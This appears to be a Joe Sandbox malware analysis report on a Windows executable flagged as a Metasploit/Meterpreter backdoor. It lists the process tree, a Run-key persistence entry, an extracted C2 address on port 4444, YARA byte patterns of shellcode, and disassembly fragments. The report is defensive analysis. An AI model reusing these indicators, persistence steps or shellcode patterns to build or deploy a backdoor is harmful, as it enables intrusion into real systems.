Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
sNifdpWiY9.exe

Overview

General Information

Sample name:sNifdpWiY9.exe
renamed because original name is a hash value
Original sample name:2c9c4c1ca31e6b9152ee5f772f6689fa2aa9df95e155aecbe4ef0ed054bfce3c.exe
Analysis ID:1569044
MD5:897699bdf92b6380fa7abd4fda6794ca
SHA1:16e0a3d46f9850c3f1c638c62607890068eb0423
SHA256:2c9c4c1ca31e6b9152ee5f772f6689fa2aa9df95e155aecbe4ef0ed054bfce3c
Tags:exeshenkuser-JAMESWT_MHT
Infos:

Detection

Metasploit, Meterpreter
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Yara detected Metasploit Payload
Yara detected Meterpreter
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject threads in other processes
Found direct / indirect Syscall (likely to bypass EDR)
Sigma detected: Potentially Suspicious Malware Callback Communication
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found decision node followed by non-executed suspicious APIs
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the installation date of Windows
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • sNifdpWiY9.exe (PID: 4900 cmdline: "C:\Users\user\Desktop\sNifdpWiY9.exe" MD5: 897699BDF92B6380FA7ABD4FDA6794CA)
    • conhost.exe (PID: 508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • systemupdate.exe (PID: 5912 cmdline: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe C:\Users\user\AppData\Roaming\SystemCache\google.bin MD5: 2EDDBA95F5818EF402BFE7FBAA0F6A18)
      • conhost.exe (PID: 180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • sNifdpWiY9.exe (PID: 3452 cmdline: "C:\Users\user\Desktop\sNifdpWiY9.exe" MD5: 897699BDF92B6380FA7ABD4FDA6794CA)
    • conhost.exe (PID: 1264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sNifdpWiY9.exe (PID: 3808 cmdline: "C:\Users\user\Desktop\sNifdpWiY9.exe" MD5: 897699BDF92B6380FA7ABD4FDA6794CA)
      • conhost.exe (PID: 6348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • sNifdpWiY9.exe (PID: 1876 cmdline: "C:\Users\user\Desktop\sNifdpWiY9.exe" MD5: 897699BDF92B6380FA7ABD4FDA6794CA)
    • conhost.exe (PID: 6028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sNifdpWiY9.exe (PID: 1860 cmdline: "C:\Users\user\Desktop\sNifdpWiY9.exe" MD5: 897699BDF92B6380FA7ABD4FDA6794CA)
      • conhost.exe (PID: 2384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
{"Type": "tcp", "IP": "89.84.63.139", "Port": 4444}
SourceRuleDescriptionAuthorStrings
00000009.00000002.2494352245.000001DE4A43D000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Metasploit_38b8ceecIdentifies the API address lookup function used by metasploit. Also used by other tools (like beacon).unknown
  • 0x139e:$a1: 89 E5 31 D2 64 8B 52 30 8B 52 0C 8B 52 14 8B 72 28 0F B7 4A 26 31 FF 31 C0 AC 3C 61
00000009.00000002.2494352245.000001DE4A43D000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Metasploit_7bc0f998Identifies the API address lookup function leverage by metasploit shellcodeunknown
  • 0x1277:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
  • 0x14af:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
  • 0x15fd:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
00000009.00000002.2494352245.000001DE4A43D000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Metasploit_c9773203Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.unknown
  • 0x12e3:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
  • 0x151b:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
  • 0x1669:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
00000009.00000002.2494768618.000001DE4A640000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Metasploit_38b8ceecIdentifies the API address lookup function used by metasploit. Also used by other tools (like beacon).unknown
  • 0x61c3e:$a1: 89 E5 31 D2 64 8B 52 30 8B 52 0C 8B 52 14 8B 72 28 0F B7 4A 26 31 FF 31 C0 AC 3C 61
00000009.00000002.2494768618.000001DE4A640000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Metasploit_7bc0f998Identifies the API address lookup function leverage by metasploit shellcodeunknown
  • 0x61b17:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
  • 0x61d4f:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
  • 0x61e9d:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
Click to see the 8 entries
SourceRuleDescriptionAuthorStrings
9.2.systemupdate.exe.1de4a6736a0.3.raw.unpackJoeSecurity_MetasploitPayload_2Yara detected Metasploit PayloadJoe Security
    9.2.systemupdate.exe.1de4a6736a0.3.raw.unpackJoeSecurity_MeterpreterYara detected MeterpreterJoe Security
      9.2.systemupdate.exe.1de4a6736a0.3.raw.unpackWindows_Trojan_Metasploit_38b8ceecIdentifies the API address lookup function used by metasploit. Also used by other tools (like beacon).unknown
      • 0x2e59e:$a1: 89 E5 31 D2 64 8B 52 30 8B 52 0C 8B 52 14 8B 72 28 0F B7 4A 26 31 FF 31 C0 AC 3C 61
      9.2.systemupdate.exe.1de4a6736a0.3.raw.unpackWindows_Trojan_Metasploit_7bc0f998Identifies the API address lookup function leverage by metasploit shellcodeunknown
      • 0x2e477:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
      • 0x2e6af:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
      • 0x2e7fd:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
      9.2.systemupdate.exe.1de4a6736a0.3.raw.unpackWindows_Trojan_Metasploit_c9773203Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.unknown
      • 0x2e4e3:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
      • 0x2e71b:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
      • 0x2e869:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
      Click to see the 24 entries

      System Summary

      barindex
      Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 89.84.63.139, DestinationIsIpv6: false, DestinationPort: 4444, EventID: 3, Image: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe, Initiated: true, ProcessId: 5912, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49702
      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\Desktop\sNifdpWiY9.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\sNifdpWiY9.exe, ProcessId: 4900, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemUpdate
      No Suricata rule has matched

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: 9.2.systemupdate.exe.1de4a3d4000.1.raw.unpackMalware Configuration Extractor: Meterpreter {"Type": "tcp", "IP": "89.84.63.139", "Port": 4444}
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 87.4% probability
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeCode function: 9_2_00007FF6EC321490 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDestroyHash,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,GetLastError,GetLastError,CryptDestroyKey,CryptReleaseContext,exit,GetLastError,CryptDestroyHash,GetLastError,GetLastError,9_2_00007FF6EC321490
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeCode function: 9_2_00007FF6EC328679 CryptDestroyKey,9_2_00007FF6EC328679
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeCode function: 9_2_00007FF6EC32F280 CryptDestroyKey,9_2_00007FF6EC32F280
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeCode function: 9_2_00007FF6EC32F290 CryptReleaseContext,9_2_00007FF6EC32F290
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeCode function: 9_2_00007FF6EC328661 CryptReleaseContext,9_2_00007FF6EC328661
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeCode function: 9_2_000001DE4A4174BC calloc,htonl,htonl,CryptDuplicateKey,GetLastError,CryptSetKeyParam,CryptSetKeyParam,CryptDecrypt,memmove_s,htonl,htonl,malloc,memcpy_s,CryptDestroyKey,9_2_000001DE4A4174BC
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeCode function: 9_2_000001DE4A4178D0 calloc,CryptAcquireContextW,GetLastError,CryptGenRandom,GetLastError,CryptImportKey,free,9_2_000001DE4A4178D0
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeCode function: 9_2_000001DE4A417678 memcpy_s,CryptDuplicateKey,GetLastError,CryptSetKeyParam,CryptGenRandom,GetLastError,CryptSetKeyParam,htonl,malloc,memcpy_s,CryptEncrypt,GetLastError,htonl,memcpy_s,memcpy_s,malloc,htonl,memcpy_s,memcpy_s,CryptDestroyKey,9_2_000001DE4A417678
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeCode function: 9_2_000001DE4A417AC8 CryptDestroyKey,CryptReleaseContext,free,9_2_000001DE4A417AC8
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeCode function: 9_2_000001DE4A417B28 CryptDecodeObjectEx,GetLastError,CryptAcquireContextW,CryptAcquireContextW,CryptImportPublicKeyInfo,CryptEncrypt,calloc,memcpy_s,CryptEncrypt,free,LocalFree,CryptDestroyKey,CryptReleaseContext,9_2_000001DE4A417B28
      Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.7:49700 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.7:49709 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.7:49735 version: TLS 1.2
      Source: sNifdpWiY9.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push rbp0_2_00007FF75F960690
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push rdi0_2_00007FF75F944440
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then lea rdx, qword ptr [rbp-31h]0_2_00007FF75F98F0C0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push rbx0_2_00007FF75F8BF096
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then mov r8d, dword ptr [rdx+04h]0_2_00007FF75F8C8F80
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push r130_2_00007FF75F8FFEE0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push rbx0_2_00007FF75F98DE50
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push rsi0_2_00007FF75F91ADD0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push rsi0_2_00007FF75F8E8CD0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push rbp0_2_00007FF75F962BA0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push rsi0_2_00007FF75F8FDC00
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then mov r8d, dword ptr [rax+r9]0_2_00007FF75F8C3AC0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then mov eax, dword ptr [rsi]0_2_00007FF75F8C9B10
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 5x nop then mov r9d, r8d0_2_00007FF75F937A40
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push rsi0_2_00007FF75F98CA80
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push rdi0_2_00007FF75F8FFA70
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push rbp0_2_00007FF75F8FFA70
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push rdi0_2_00007FF75F8FFA70
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push rbp0_2_00007FF75F8FFA70
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 5x nop then lea edx, dword ptr [r9+r9*4]0_2_00007FF75F8C1A90
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 5x nop then mov rax, rcx0_2_00007FF75F8D2A00
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then mov rax, rcx0_2_00007FF75F8E1940
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then mov eax, dword ptr [rcx+10h]0_2_00007FF75F8E0870
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then mov eax, dword ptr [rcx]0_2_00007FF75F8C6640
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push r150_2_00007FF75F8EB640
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push r150_2_00007FF75F900500
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push rsi0_2_00007FF75F8FC490
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 5x nop then xor eax, eax0_2_00007FF75F8C8240
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then mov rax, qword ptr [rcx+10h]0_2_00007FF75F8DC189
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeCode function: 4x nop then mov eax, dword ptr [rcx]9_2_00007FF6EC3252C0
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeCode function: 4x nop then mov eax, dword ptr [rsi]9_2_00007FF6EC327750
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then lea rdx, qword ptr [rbp-31h]12_2_00007FF75F98F0C0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push rbx12_2_00007FF75F8BF096
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then mov r8d, dword ptr [rdx+04h]12_2_00007FF75F8C8F80
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push r1312_2_00007FF75F8FFEE0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push rbx12_2_00007FF75F98DE50
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push rsi12_2_00007FF75F91ADD0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push rsi12_2_00007FF75F8E8CD0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push rbp12_2_00007FF75F962BA0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push rsi12_2_00007FF75F8FDC00
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then mov r8d, dword ptr [rax+r9]12_2_00007FF75F8C3AC0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then mov eax, dword ptr [rsi]12_2_00007FF75F8C9B10
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 5x nop then mov r9d, r8d12_2_00007FF75F937A40
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push rsi12_2_00007FF75F98CA80
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push rdi12_2_00007FF75F8FFA70
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push rbp12_2_00007FF75F8FFA70
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push rdi12_2_00007FF75F8FFA70
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push rbp12_2_00007FF75F8FFA70
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 5x nop then lea edx, dword ptr [r9+r9*4]12_2_00007FF75F8C1A90
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 5x nop then mov rax, rcx12_2_00007FF75F8D2A00
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then mov rax, rcx12_2_00007FF75F8E1940
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then mov eax, dword ptr [rcx+10h]12_2_00007FF75F8E0870
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then mov eax, dword ptr [rcx]12_2_00007FF75F8C6640
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push r1512_2_00007FF75F8EB640
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push rbp12_2_00007FF75F960690
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push r1512_2_00007FF75F900500
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push rdi12_2_00007FF75F944440
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push rsi12_2_00007FF75F8FC490
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 5x nop then xor eax, eax12_2_00007FF75F8C8240
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then mov rax, qword ptr [rcx+10h]12_2_00007FF75F8DC189
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then lea rdx, qword ptr [rbp-31h]16_2_00007FF75F98F0C0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push rbx16_2_00007FF75F8BF096
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then mov r8d, dword ptr [rdx+04h]16_2_00007FF75F8C8F80
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push r1316_2_00007FF75F8FFEE0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push rbx16_2_00007FF75F98DE50
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push rsi16_2_00007FF75F91ADD0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push rsi16_2_00007FF75F8E8CD0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push rbp16_2_00007FF75F962BA0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push rsi16_2_00007FF75F8FDC00
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then mov r8d, dword ptr [rax+r9]16_2_00007FF75F8C3AC0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then mov eax, dword ptr [rsi]16_2_00007FF75F8C9B10
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 5x nop then mov r9d, r8d16_2_00007FF75F937A40
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push rsi16_2_00007FF75F98CA80
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push rdi16_2_00007FF75F8FFA70
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push rbp16_2_00007FF75F8FFA70
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push rdi16_2_00007FF75F8FFA70
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push rbp16_2_00007FF75F8FFA70
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 5x nop then lea edx, dword ptr [r9+r9*4]16_2_00007FF75F8C1A90
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 5x nop then mov rax, rcx16_2_00007FF75F8D2A00
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then mov rax, rcx16_2_00007FF75F8E1940
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then mov eax, dword ptr [rcx+10h]16_2_00007FF75F8E0870
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then mov eax, dword ptr [rcx]16_2_00007FF75F8C6640
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push r1516_2_00007FF75F8EB640
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push rbp16_2_00007FF75F960690
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push r1516_2_00007FF75F900500
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push rdi16_2_00007FF75F944440
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push rsi16_2_00007FF75F8FC490
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 5x nop then xor eax, eax16_2_00007FF75F8C8240
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then mov rax, qword ptr [rcx+10h]16_2_00007FF75F8DC189
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then lea rdx, qword ptr [rbp-31h]19_2_00007FF75F98F0C0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push rbx19_2_00007FF75F8BF096
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then mov r8d, dword ptr [rdx+04h]19_2_00007FF75F8C8F80
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push r1319_2_00007FF75F8FFEE0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push rbx19_2_00007FF75F98DE50
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push rsi19_2_00007FF75F91ADD0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push rsi19_2_00007FF75F8E8CD0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push rbp19_2_00007FF75F962BA0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push rsi19_2_00007FF75F8FDC00
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then mov r8d, dword ptr [rax+r9]19_2_00007FF75F8C3AC0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then mov eax, dword ptr [rsi]19_2_00007FF75F8C9B10
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 5x nop then mov r9d, r8d19_2_00007FF75F937A40
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push rsi19_2_00007FF75F98CA80
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push rdi19_2_00007FF75F8FFA70
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push rbp19_2_00007FF75F8FFA70
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push rdi19_2_00007FF75F8FFA70
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push rbp19_2_00007FF75F8FFA70
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 5x nop then lea edx, dword ptr [r9+r9*4]19_2_00007FF75F8C1A90
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 5x nop then mov rax, rcx19_2_00007FF75F8D2A00
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then mov rax, rcx19_2_00007FF75F8E1940
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then mov eax, dword ptr [rcx+10h]19_2_00007FF75F8E0870
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then mov eax, dword ptr [rcx]19_2_00007FF75F8C6640
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push r1519_2_00007FF75F8EB640
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push rbp19_2_00007FF75F960690
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push r1519_2_00007FF75F900500
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push rdi19_2_00007FF75F944440
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push rsi19_2_00007FF75F8FC490
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 5x nop then xor eax, eax19_2_00007FF75F8C8240
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then mov rax, qword ptr [rcx+10h]19_2_00007FF75F8DC189
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then lea rdx, qword ptr [rbp-31h]22_2_00007FF75F98F0C0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push rbx22_2_00007FF75F8BF096
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then mov r8d, dword ptr [rdx+04h]22_2_00007FF75F8C8F80
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push r1322_2_00007FF75F8FFEE0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push rbx22_2_00007FF75F98DE50
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push rsi22_2_00007FF75F91ADD0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push rsi22_2_00007FF75F8E8CD0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push rbp22_2_00007FF75F962BA0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push rsi22_2_00007FF75F8FDC00
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then mov r8d, dword ptr [rax+r9]22_2_00007FF75F8C3AC0
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then mov eax, dword ptr [rsi]22_2_00007FF75F8C9B10
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 5x nop then mov r9d, r8d22_2_00007FF75F937A40
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push rsi22_2_00007FF75F98CA80
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push rdi22_2_00007FF75F8FFA70
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push rbp22_2_00007FF75F8FFA70
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 4x nop then push rdi22_2_00007FF75F8FFA70
